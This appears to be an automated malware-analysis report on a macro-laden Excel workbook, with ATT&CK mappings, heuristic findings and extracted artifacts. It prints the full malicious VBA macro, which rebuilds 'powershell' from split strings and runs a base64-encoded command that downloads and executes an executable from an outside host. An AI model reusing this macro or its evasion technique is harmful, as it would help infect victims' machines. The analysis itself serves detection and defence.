MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains VBA macros that use obfuscated string concatenation to construct and execute a PowerShell command. This command is designed to download and execute a second-stage payload from the URL 'http://nhry9udg.gize.com/XX/xml/swoolsV.exe'. The use of Shell() and the reassembled 'PowerShell' keyword indicate a clear intent to execute external code.
Heuristics 3
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2602 bytes |
SHA-256: 885e9d5cc539b44151a48d704b164d430923f94d4f072dc7a96d432e2f876ba7 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_SheetBeforeRightClick(ByVal Sh As Object, ByVal Target As Range, Cancel As Boolean)
End Sub
Private Sub Workbook_SheetCalculate(ByVal Sh As Object)
End Sub
Private Sub Workbook_Activate()
On Error Resume Next
Dim i As Double
Dim batch As String
Dim call1 As String
Dim s As String
s = s + "start /MIN C:\Windo"
s = s + "ws\System32\" + "Wind" + "owsPo" + "werShe" + "ll\v1.0\pow" + "ersh" + "ell.exe"
s = s + " -win " + "1 -enc"
s = s + " "
s = s + "JABQAHIAbwBjAE4"
s = s + "AYQBtAGUAIAA9AC"
s = s + "AAIgBVAGsAcQB6A"
s = s + "HIAdABkAHEAcgBo"
s = s + "AHYAZABvAGMAdAB"
s = s + "sAHgALgBlAHgAZQ"
s = s + "AiADsAKABOAGUAd"
s = s + "wAtAE8AYgBqAGUA"
s = s + "YwB0ACAAUwB5AHM"
s = s + "AdABlAG0ALgBOAG"
s = s + "UAdAAuAFcAZQBiA"
s = s + "EMAbABpAGUAbgB0"
s = s + "ACkALgBEAG8AdwB"
s = s + "uAGwAbwBhAGQARg"
s = s + "BpAGwAZQAoACIAa"
s = s + "AB0AHQAcAA6AC8A"
s = s + "LwBuAGgAcgB5ADk"
s = s + "AdABnAC4AZwBpAG"
s = s + "kAegBlAC4AYwBvA"
s = s + "G0ALwBYAFgAWAAv"
s = s + "AHgAbQBsAC8AcwB"
s = s + "wAG8AbwBsAHMAdg"
s = s + "AuAGUAeABlACIAL"
s = s + "AAiACQAZQBuAHYA"
s = s + "OgBBAFAAUABEAEE"
s = s + "AVABBAFwAJABQAH"
s = s + "IAbwBjAE4AYQBtA"
s = s + "GUAIgApADsAUwB0"
s = s + "AGEAcgB0AC0AUAB"
s = s + "yAG8AYwBlAHMAcw"
s = s + "AgACgAIgAkAGUAb"
s = s + "gB2ADoAQQBQAFAA"
s = s + "RABBAFQAQQBcACQ"
s = s + "AUAByAG8AYwBOAG"
s = s + "EAbQBlACIAKQA="
ActiveWorkbook.Save
batch = "Pegpgdjacxprwtaahcsdty.bat"
Open batch For Output As #1
Print #1, s
Close #1
i = Shell(batch, 0)
End Sub
Private Sub Cellss()
End Sub
Private Sub Workbook_SheetSelectionChange(ByVal Sh As Object, ByVal Target As Range)
End Sub
Attribute VB_Name = "Arkusz1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Workbook"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 6144 bytes |
SHA-256: 9efccbeb664c77aab997275a8c7009ca2c08b433b79f24aff8c3d718fd43b6af |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.